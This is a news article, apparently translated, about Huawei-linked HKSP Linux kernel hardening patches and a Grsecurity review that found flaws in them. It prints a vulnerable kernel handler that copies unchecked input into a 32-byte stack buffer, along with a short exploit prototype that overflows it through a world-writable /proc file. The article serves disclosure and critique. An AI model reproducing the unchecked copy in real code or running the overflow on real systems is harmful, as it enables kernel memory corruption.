Developers of the Grsecurity project
The HKSP patches were published by a Huawei employee, include a mention of Huawei in the GitHub profile, and use the word Huawei in the project name (HKSP - Huawei Kernel Self Protection). At the same time, Huawei representatives denied the connection of the HKSP project with the company and stated that the code was developed on the employee’s personal initiative, is not an official Huawei project and is not used in the company’s products. On
HKSP includes changes such as randomization of offsets in the cred structure, protection against attacks on the user identifier namespace (pid namespace), separation of the process stack from the mmap area, detection of double calls to the kfree function, blocking leaks through the pseudo-FS /proc (/proc/ {modules, keys, key-users}, /proc/sys/kernel/* and /proc/sys/vm/mmap_min_addr, /proc/kallsyms), improved user space address randomization, additional Ptrace protection, enhanced smap and smep protection , the ability to prohibit sending data via raw sockets, blocking incorrect addresses in UDP sockets and checking the integrity of running processes. It also includes the Ksguard kernel module, which is aimed at detecting attempts to introduce typical rootkits.
Patches
A study of the patch by Grsecurity developers revealed many errors and weaknesses in the code, and also showed the absence of a threat model that would allow them to adequately judge the capabilities of the project. To clearly demonstrate that the code was written without using secure programming methods, an example of a trivial vulnerability in the handler is given.
file /proc/ksguard/state, which is created with rights 0777, implying that everyone has write access. The ksg_state_write function, used to parse commands written to /proc/ksguard/state, creates a tmp[32] buffer to which data is written based on the size of the operand passed, without taking into account the size of the target buffer and without checking the parameter with the string size. Those. To overwrite part of the kernel stack, an attacker just needs to write a specially formatted line to /proc/ksguard/state.
static ssize_t ksg_state_write(struct file *file, const char __user *buf,
size_t len, loff_t *offset)
{
u64 value;
char tmp [32];
size_t n = 0;
if (copy_from_user(tmp, buf, len))
return -1;
value = simple_strtoul(tmp, '\0', 10);
...
Exploit prototype:
char buf[4096] = { };
int fd = open(“/proc/ksguard/state”, O_WRONLY);
if (fd >= 0) {
write(fd, buf, sizeof(buf));
close(fd);
}
Source: opennet.ru